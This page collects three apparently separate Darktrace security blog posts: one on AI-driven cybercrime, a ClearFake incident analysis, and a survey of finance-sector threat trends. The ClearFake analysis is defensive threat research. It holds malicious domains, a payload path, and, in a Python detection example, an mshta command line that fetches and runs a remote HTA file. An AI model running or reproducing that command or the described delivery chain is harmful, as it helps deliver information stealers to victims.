Blog / AI / March 7, 2024

Defending Against the New Normal in Cybercrime: AI

This blog outlines research & data points on the evolving threat landscape, the impact of malicious AI, and why proactive cyber readiness is essential.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Max Heinemeyer
Global Field CISO

AI in Cyber Security

Over the last 18 months, discussions about artificial intelligence (AI) – specifically generative AI – have ranged from excitement and optimism about its transformative potential to fear and uncertainty about the new risks it introduces.

New research [1] commissioned by Darktrace shows that 89 percent of IT security teams polled globally believe AI-augmented cyber threats will have a significant impact on their organization within the next two years, yet 60 percent believe they are currently unprepared to defend against these attacks. Their concerns include increased volume and sophistication of malware that targets known vulnerabilities and increased exposure of sensitive or proprietary information from using generative AI tools.

At Darktrace, we monitor trends across our global customer base to understand how the challenges facing security teams are evolving alongside industry advancements in AI. We’ve observed that AI, automation, and cybercrime-as-a-service have increased the speed, sophistication and efficacy of cyber security attacks.  

How AI Impacts Phishing Attempts

Darktrace has observed immediate impacts on phishing, which remains one of the most common forms of attack. In April 2023, Darktrace shared research that found a 135 percent increase in ‘novel social engineering attacks’ in the first two months of 2023, corresponding with the widespread adoption of ChatGPT [2]. These phishing attacks showed a strong linguistic deviation – semantically and syntactically – compared to other phishing emails, which suggested to us that generative AI is providing an avenue for threat actors to craft sophisticated and targeted attacks at speed and scale. A year later, we’ve seen this trend continue. Darktrace customers received approximately 2,867,000 phishing emails in December 2023 alone, a 14 percent increase on what was observed months prior in September [3]. Between September and December 2023, phishing attacks that used novel social engineering techniques grew by 35 percent on average across the Darktrace customer base [4].

These observations reinforce trends that others in the industry have shared. For example, Microsoft and OpenAI recently published research on tactics, techniques, and procedures (TTPs) augmented by large language models (LLMs) that they have observed nation-state threat actors using. That includes using LLMs to draft and generate social engineering attacks, inform reconnaissance, assist with vulnerability research and more.  

The Rise of Cybercrime-as-a-Service

The increasing cyber challenge facing defenders cannot be attributed to AI alone. The rise of cybercrime-as-a-service is also changing the dynamic. Darktrace’s 2023 End of Year Threat Report found that cybercrime-as-a-service continues to dominate the threat landscape, with Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) tools making up most of the malicious tools in use by attackers. The as-a-service ecosystem can provide attackers with everything from pre-made malware to templates for phishing emails, payment processing systems and even helplines, enabling bad actors to mount attacks with limited technical knowledge.

These trends make it clear that attackers now have a more widely accessible toolbox that lowers the barrier to entry.

AI Enabling Accidental Insider Threats

However, the new risks facing businesses aren’t from external threat actors alone. Use of generative AI tools within the enterprise introduces a new category of accidental insider threats. Employees using generative AI tools now have easier access to more organizational data than ever before. Even the most well-intentioned employee could unintentionally leak or access restricted, sensitive data via these tools. In the second half of 2023, we observed that approximately half of Darktrace customers had employees accessing generative AI services. As this continues to increase, organizations need policies in place to guide the use cases for generative AI tools as well as strong data governance and the ability to enforce these policies to minimize risk.  

It is inevitable that AI will increase the risks and threats facing an organization, but this is not an unsolvable challenge from a defensive perspective. While advancements in generative AI may be worsening issues like novel social engineering and creating new types of accidental insider threats, AI itself offers a strong defense.  

The Shift to Proactive Cyber Readiness

According to the World Economic Forum’s Global Cybersecurity Outlook 2024, the number of organizations that “maintain minimum viable cyber resilience is down 30 percent compared to 2023”, and “while large organizations have demonstrated gains in cyber resilience, small and medium-sized companies showed significant decline.” The importance of cyber resilience cannot be overstated in the face of today’s increasingly as-a-service, automated, and AI-augmented threat landscape.

Historically, organizations have waited for incidents to happen and relied on known attack data for threat detection and response, making it nearly impossible to identify never-before-seen threats. The traditional security stack has also relied heavily on point solutions focused on protecting different pieces of the digital environment, with individual tools for endpoint, email, network, on-premises data centers, SaaS applications, cloud, OT and beyond. These point solutions fail to correlate disparate incidents to form a complete picture of an orchestrated attack. Even with the addition of tools that can stitch together events from across the enterprise, defenders remain in a reactive state focused heavily on threat detection and response.

Organizations need to evolve from a reactive posture to a stance of proactive cyber readiness. To do so, they need an approach that proactively identifies internal and external vulnerabilities, identifies gaps in security policy and process before an attack occurs, breaks down silos to investigate all threats (known and unknown) during an attack, and uplifts the human analyst beyond menial tasks to incident validation and recovery after an attack.  

AI can help break down silos within the SOC and provide a more proactive approach to scale up and augment defenders. It provides richer context when it is fed information from multiple systems, data sets, and tools within the stack and can build an in-depth, real-time behavioural understanding of a business that humans alone cannot.

Lessons From AI in the SOC

At Darktrace, we’ve been applying AI to the challenge of cyber security for more than ten years, and we know that proactive cyber readiness requires the right mix of people, process, and technology.  

When the right AI is applied responsibly to the right cyber security challenge, the impact on both the human security team and the business is profound.

AI can bring machine speed and scale to some of the most time-intensive, error-prone, and psychologically draining components of cyber security, helping humans focus on the value-added work that only they can provide. Incident response and continuous monitoring are two areas where AI has already been proven to effectively augment defenders. For example, a civil engineering company used Darktrace’s AI to uplift its SOC team from the repetitive, manual tasks of analyzing and responding to email incidents. The analysts estimated they were each spending 10 hours per week on email incident analysis. With AI autonomously analyzing and responding to email incidents, the analysts could gain approximately 20 percent of their time back to focus on proactive cyber security measures.

An effective human-AI partnership is key to proactive cyber readiness and can directly benefit the work-life of defenders. It can help to reduce burnout, support data-driven decision-making, and reduce the reliance on hard-to-find, specialized talent that has created a skills shortage in cyber security for many years. Most importantly, AI can free up team members to focus on more meaningful tasks, such as compliance initiatives, user education, and sophisticated threat hunting.  

Advancements in AI are happening at a rapid pace. As we’ve already observed, attackers will be watching these developments and looking for ways to use them to their advantage. Luckily, AI has already proved to be an asset for defenders, and embracing a proactive approach to cyber resilience can help organizations increase their readiness for this next phase. Prioritizing cyber security will be an enabler of innovation and progress as AI development continues.

--

Join Darktrace on 9 April for a virtual event exploring the latest innovations needed to get ahead of the rapidly evolving threat landscape. Register today to hear more about what’s coming to Darktrace’s offerings.

References

[1] The survey was undertaken by AimPoint Group & Dynata on behalf of Darktrace between December 2023 & January 2024. The research polled 1,773 security professionals in positions across the security team, from junior roles to CISOs, across 14 countries – Australia, Brazil, France, Germany, Italy, Japan, Mexico, Netherlands, Singapore, Spain, Sweden, UAE, UK, and USA.

[2] Based on the average change in email attacks between January and February 2023 detected across Darktrace/Email deployments with control of outliers.

[3] Average calculated across Darktrace customers from 31st August to 21st December.

[4] Average calculated across Darktrace customers from 31st August to 21st December. Novel social engineering attacks use linguistic techniques that are different to techniques used in the past, as measured by a combination of semantics, phrasing, text volume, punctuation, and sentence length.



Blog / Endpoint / January 30, 2026

ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval


What is ClearFake?

As threat actors evolve their techniques to exploit victims and breach target networks, the ClearFake campaign has emerged as a significant illustration of this continued adaptation. ClearFake is a campaign observed using a malicious JavaScript framework deployed on compromised websites, impacting sectors such as e‑commerce, travel, and automotive. First identified in mid‑2023, ClearFake is frequently leveraged to socially engineer victims into installing fake web browser updates.

In ClearFake compromises, victims are steered toward compromised WordPress sites, often positioned by attackers through search engine optimization (SEO) poisoning. Once on the site, users are presented with a fake CAPTCHA. This counterfeit challenge is designed to appear legitimate while enabling the execution of malicious code. When a victim interacts with the CAPTCHA, a PowerShell command containing a download string is retrieved and executed.

Attackers commonly abuse the legitimate Microsoft HTML Application Host (MSHTA) in these operations. Recent campaigns have also incorporated Smart Chain endpoints, such as “bsc-dataseed.binance[.]org,” to obtain configuration code. The primary payload delivered through ClearFake is typically an information stealer, such as Lumma Stealer, enabling credential theft, data exfiltration, and persistent access [1].

Darktrace’s Coverage of ClearFake

Darktrace / ENDPOINT first detected activity likely associated with ClearFake on a single device over the course of one day on November 18, 2025. The system observed the execution of “mshta.exe,” the legitimate Microsoft HTML Application Host utility. It also noted a repeated process command referencing “weiss.neighb0rrol1[.]ru”, indicating suspicious external activity. Subsequent analysis of this endpoint using open‑source intelligence (OSINT) indicated that it was a malicious domain generation algorithm (DGA) endpoint [2].

Figure 1: The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.
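Darktrace’s own classifiers are proprietary, but the lexical traits that make a hostname like this stand out to OSINT tooling (digit substitutions, high character entropy) can be sketched with a simple feature extractor. The code below is purely illustrative and not Darktrace’s detection logic; the hostnames are used only as inert strings.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a domain label."""
    counts = Counter(label)
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def dga_features(hostname: str) -> dict:
    """Crude lexical features of the second-level label.
    Real DGA detection combines many more signals; this is a sketch."""
    label = hostname.split(".")[-2]
    digits = sum(ch.isdigit() for ch in label)
    return {
        "label": label,
        "length": len(label),
        "entropy": round(label_entropy(label), 2),
        "digit_ratio": round(digits / len(label), 2),
    }

# The IoC from this incident versus a benign name:
print(dga_features("weiss.neighb0rrol1.ru"))
print(dga_features("www.microsoft.com"))
```

Digit substitutions inside an otherwise alphabetic label (“0” for “o”, “1” for “l”) push the digit ratio above what benign second-level domains typically show.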

This activity indicates that mshta.exe was used to contact a remote server, “weiss.neighb0rrol1[.]ru/rpxacc64mshta,” and execute the associated HTA file to initiate the next stage of the attack. OSINT sources have since heavily flagged this server as potentially malicious [3].

The first argument in this process uses the MSHTA utility to execute the HTA file hosted on the remote server. If successful, MSHTA would then run JavaScript or VBScript to launch PowerShell commands used to retrieve malicious payloads, a technique observed in previous ClearFake campaigns. Darktrace also detected unusual activity involving additional Microsoft executables, including “winlogon.exe,” “userinit.exe,” and “explorer.exe.” Although these binaries are legitimate components of the Windows operating system, threat actors can abuse their normal behavior within the Windows login sequence to gain control over user sessions, similar to the misuse of mshta.exe.
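Darktrace’s models are not rule-based, but the core signal described above, mshta.exe invoked with a remote URL on its command line, is straightforward to hunt for in process telemetry. A minimal sketch, assuming hypothetical log records shaped like EDR or Sysmon process-creation events:

```python
import re

# Hypothetical process-creation records; the malicious URL mirrors the
# incident's defanged IoC and is used only as an inert string.
events = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://weiss.neighb0rrol1.ru/rpxacc64mshta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Users\Public\update.hta"},
]

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def suspicious_mshta(event: dict) -> bool:
    """Flag mshta.exe invocations whose command line references a remote
    URL, a common living-off-the-land pattern (MITRE T1218.005)."""
    if not event["image"].lower().endswith("mshta.exe"):
        return False
    return bool(REMOTE_URL.search(event["cmdline"]))

hits = [e for e in events if suspicious_mshta(e)]
print(len(hits))  # → 1 (only the URL-bearing invocation is flagged)
```

A local HTA path is not inherently malicious, so the sketch only flags the remote-retrieval variant; a production hunt would also inspect parent processes and child PowerShell activity.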

EtherHiding cover

Darktrace also identified additional ClearFake‑related activity, specifically a connection to bsc-testnet.drpc[.]org, a legitimate BNB Smart Chain endpoint. This activity was triggered by injected JavaScript on the compromised site www.allstarsuae[.]com, where the script initiated an eth_call POST request to the Smart Chain endpoint.

Figure 2: Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.

EtherHiding is a technique in which threat actors leverage blockchain technology, specifically smart contracts, as part of their malicious infrastructure. Because blockchain is anonymous, decentralized, and highly persistent, it provides threat actors with advantages in evading defensive measures and traditional tracking [4].

In this case, when a user visits a compromised WordPress site, injected base64‑encoded JavaScript retrieved an ABI string, which was then used to load and execute a contract hosted on the BNB Smart Chain.

Figure 3: JavaScript hosted on the compromised site www.allstaruae[.]com.

Malware analysis of this instance showed that the Base64 decoded into a JavaScript loader. A POST request to bsc-testnet.drpc[.]org was then used to retrieve a hex‑encoded ABI string that loads and executes the contract. The JavaScript also contained hex and Base64‑encoded functions that decoded into additional JavaScript, which attempted to retrieve a payload hosted on GitHub at “github[.]com/PrivateC0de/obf/main/payload.txt.” However, this payload was unavailable at the time of analysis.
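For analysts replicating this retrieval step, the blockchain lookup is an ordinary JSON-RPC `eth_call` POST to the Smart Chain endpoint. The sketch below shows only the request shape; the contract address and calldata are placeholders, not the values used by ClearFake.

```python
import json

def build_eth_call(contract: str, calldata: str) -> dict:
    """JSON-RPC body for a read-only eth_call against a smart contract.
    Both arguments here are placeholders for illustration only."""
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [{"to": contract, "data": calldata}, "latest"],
    }

# Placeholder 20-byte address and 4-byte function selector:
body = build_eth_call("0x" + "00" * 20, "0x" + "ab" * 4)
print(json.dumps(body))
```

Because `eth_call` is read-only and served by any public RPC node, the request leaves no on-chain trace, one of the properties that makes EtherHiding attractive to attackers and hard to take down.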

Figure 4: Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 5: Darktrace’s detection of the executable file and the malicious hostname.

Autonomous Response

As Darktrace’s Autonomous Response capability was enabled on this customer’s network, Darktrace was able to take swift mitigative action to contain the ClearFake‑related activity early, before it could lead to potential payload delivery. The affected device was blocked from making external connections to a number of suspicious endpoints, including 188.114.96[.]6, *.neighb0rrol1[.]ru, and neighb0rrol1[.]ru, ensuring that no further malicious connections could be made and no payloads could be retrieved.

Autonomous Response also acted to prevent the executable mshta.exe from initiating HTA file execution over HTTPS from this endpoint by blocking the attempted connections. Had these files executed successfully, the attack would likely have resulted in the retrieval of an information stealer, such as Lumma Stealer.

Figure 6: Autonomous Response’s intervention against the suspicious connectivity observed.

Conclusion

ClearFake continues to be observed across multiple sectors, but Darktrace remains well‑positioned to counter such threats. Because ClearFake’s end goal is often to deliver malware such as information stealers and malware loaders, early disruption is critical to preventing compromise. Users should remain aware of this activity and vigilant regarding fake CAPTCHA pop‑ups. They should also monitor unusual usage of MSHTA and outbound connections to domains that mimic formats such as “bsc-dataseed.binance[.]org” [1].

In this case, Darktrace was able to contain the attack before it could successfully escalate and execute. The attempted execution of HTA files was detected early, allowing Autonomous Response to intervene, stopping the activity from progressing. As soon as the device began communicating with weiss.neighb0rrol1[.]ru, an Autonomous Response inhibitor triggered and interrupted the connections.

As ClearFake continues to rise, users should stay alert to social engineering techniques, including ClickFix, that rely on deceptive security prompts.

Credit to Vivek Rajan (Senior Cyber Analyst) and Tara Gould (Malware Research Lead)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

Process / New Executable Launched

Endpoint / Anomalous Use of Scripting Process

Endpoint / New Suspicious Executable Launched

Endpoint / Process Connection::Unusual Connection from New Process

Autonomous Response Models

Antigena / Network::Significant Anomaly::Antigena Significant Anomaly from Client Block

List of Indicators of Compromise (IoCs)

  • weiss.neighb0rrol1[.]ru – Hostname – Malicious domain
  • 188.114.96[.]6 – IP address – Suspicious IP
  • *.neighb0rrol1[.]ru – Domain – Malicious domain

MITRE ATT&CK Mapping

Drive-by Compromise – Initial Access – T1189

User Execution – Execution – T1204

Software Deployment Tools – Execution, Lateral Movement – T1072

Command and Scripting Interpreter – Execution – T1059

System Binary Proxy Execution: Mshta – Defense Evasion – T1218.005

References

[1] https://www.kroll.com/en/publications/cyber/rapid-evolution-of-clearfake-delivery

[2] https://www.virustotal.com/gui/domain/weiss.neighb0rrol1.ru

[3] https://www.virustotal.com/gui/file/1f1aabe87e5e93a8fff769bf3614dd559c51c80fc045e11868f3843d9a004d1e/community

[4] https://www.packetlabs.net/posts/etherhiding-a-new-tactic-for-hiding-malware-on-the-blockchain/

About the author
Vivek Rajan
Cyber Analyst

Blog / Network / January 30, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch


The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging

Phishing continues to be a leading initial access vector for attacks targeting confidentiality. Financial institutions are frequently targeted with phishing emails designed to harvest login credentials. Techniques such as Adversary-in-the-Middle (AiTM) attacks, which bypass multi-factor authentication (MFA), and QR code phishing (“quishing”) are surging and are capable of fooling even trained users. In the first half of 2025, Darktrace observed 2.4 million phishing emails within financial sector customer deployments, with almost 30% targeted at VIP users.

2. Data Loss Prevention is an increasing challenge

Compliance issues – particularly data loss prevention (DLP) – remain a persistent risk. In October 2025 alone, Darktrace observed over 214,000 emails across financial sector customers that contained unfamiliar attachments and were sent to suspected personal email addresses. Across the same set of customers within the same time frame, more than 351,000 emails containing unfamiliar attachments were sent to freemail addresses (e.g., Gmail, Yahoo, iCloud), highlighting clear concerns around DLP.
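As an illustration of the kind of rule this data argues for (a generic sketch, not Darktrace’s detection logic), a minimal check that flags outbound mail pairing attachments with freemail recipients might look like:

```python
# Illustrative freemail list; real deployments would maintain a far
# larger set and combine this with content and sender-behavior signals.
FREEMAIL = {"gmail.com", "yahoo.com", "icloud.com"}

def dlp_flag(msg: dict) -> bool:
    """Flag outbound mail with attachments sent to freemail domains."""
    domains = {addr.rsplit("@", 1)[-1].lower() for addr in msg["to"]}
    return bool(msg["attachments"]) and bool(domains & FREEMAIL)

print(dlp_flag({"to": ["alice@gmail.com"], "attachments": ["q3.xlsx"]}))  # True
print(dlp_flag({"to": ["bob@corp.example"], "attachments": []}))          # False
```

Attachment-plus-freemail is a coarse heuristic with obvious false positives (many legitimate customers use Gmail), which is why the report frames this as a visibility and governance problem rather than one solvable by a single rule.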

Confidentiality remains a primary concern for financial institutions as attackers increasingly target sensitive customer data, financial records, and internal communications.  

3. Ransomware is evolving toward data theft and extortion

Ransomware is no longer just about locking systems; it is about stealing data first and encrypting second. Groups such as Cl0p and RansomHub now prioritize exploiting trusted file-transfer platforms to exfiltrate sensitive data before encryption, maximizing regulatory and reputational fallout for victims.

Darktrace’s threat research identified routine scanning and malicious activity targeting internet-facing file-transfer systems used heavily by financial institutions. In one notable case involving Fortra GoAnywhere MFT, Darktrace detected malicious exploitation behavior six days before the CVE was publicly disclosed, demonstrating how attackers often operate ahead of patch cycles.

This evolution underscores a critical reality: by the time a vulnerability is disclosed publicly, it may already be actively exploited.

4. Attackers are exploiting edge devices, often pre-disclosure

VPNs, firewalls, and remote access gateways have become high-value targets, and attackers are increasingly exploiting them before vulnerabilities are publicly disclosed. Darktrace observed pre-CVE exploitation activity affecting edge technologies including Citrix, Palo Alto, and Ivanti, enabling session hijacking, credential harvesting, and privileged lateral movement into core banking systems.  

Once compromised, these edge devices allow adversaries to blend into trusted network traffic, bypassing traditional perimeter defenses. CISOs interviewed for the report repeatedly described VPN infrastructure as a “concentrated focal point” for attackers, especially when patching and segmentation lag behind operational demands.

5. DPRK-linked activity is growing across crypto and fintech

State-sponsored activity, particularly from DPRK-linked groups affiliated with Lazarus, continues to intensify across cryptocurrency and fintech organizations. Darktrace identified coordinated campaigns leveraging malicious npm packages, previously undocumented BeaverTail and InvisibleFerret malware, and exploitation of React2Shell (CVE-2025-55182) for credential theft and persistent backdoor access.  

Targeting was observed across the United Kingdom, Spain, Portugal, Sweden, Chile, Nigeria, Kenya, and Qatar, highlighting the global scope of these operations.  

6. Cloud complexity and AI governance gaps are now systemic risks

Finally, CISOs consistently pointed to cloud complexity, insider risk from new hires, and ungoverned AI usage exposing sensitive data as systemic challenges. Leaders emphasized difficulty maintaining visibility across multi-cloud environments while managing sensitive data exposure through emerging AI tools.  

Rapid AI adoption without clear guardrails has introduced new confidentiality and compliance risks, turning governance into a board-level concern rather than a purely technical one.

Building cyber resilience in a shifting threat landscape

The financial sector remains a prime target for both financially motivated and state-sponsored adversaries. What this research makes clear is that yesterday’s security assumptions no longer hold. Identity attacks, pre-disclosure exploitation, and data-first ransomware require adaptive, behavior-based defenses that can detect threats as they emerge, often ahead of public disclosure.

As financial institutions continue to digitize, resilience will depend on visibility across identity, edge, cloud, and data, combined with AI-driven defense that learns at machine speed.  

Learn more about the threats facing the finance sector, and what your organization can do to keep up in The State of Cybersecurity in the Finance Sector report here.  

Acknowledgements:

The State of Cybersecurity in the Finance sector report was authored by Calum Hall, Hugh Turnbull, Parvatha Ananthakannan, Tiana Kelly, and Vivek Rajan, with contributions from Emma Foulger, Nicole Wong, Ryan Traill, Tara Gould, and the Darktrace Threat Research and Incident Management teams.


About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO